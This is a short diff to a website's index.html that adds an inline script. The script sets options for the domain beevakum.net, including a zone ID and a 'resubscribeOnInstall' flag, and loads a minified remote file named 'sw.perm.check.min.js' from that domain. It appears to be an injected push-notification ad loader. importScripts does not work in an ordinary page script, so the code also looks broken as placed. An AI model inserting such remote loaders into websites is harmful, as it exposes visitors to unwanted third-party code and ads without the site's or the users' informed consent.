--- a/index.html
+++ b/index.html
@@ -54,6 +54,33 @@
     }
 </script>
 
+<script>
+    function getYmid() {
+    try {
+        return new URL(location.href).searchParams.get('ymid');
+    } catch (e) {
+        console.warn(e);
+    }
+    return null;
+}
+function getVar() {
+    try {
+        return new URL(location.href).searchParams.get('var');
+    } catch (e) {
+        console.warn(e);
+    }
+    return null;
+}
+self.options = {
+    "domain": "beevakum.net",
+    "resubscribeOnInstall": true,
+    "zoneId": 8062162,
+    "ymid": getYmid(),
+    "var": getVar()
+}
+self.lary = "";
+importScripts('https://beevakum.net/act/files/sw.perm.check.min.js?r=sw');
+</script>
     
 <!-- Google Analitics tag (gtag.js) -->
 <script async src="https://www.googletagmanager.com/gtag/js?id=G-TXH1LMQJGQ"></script>
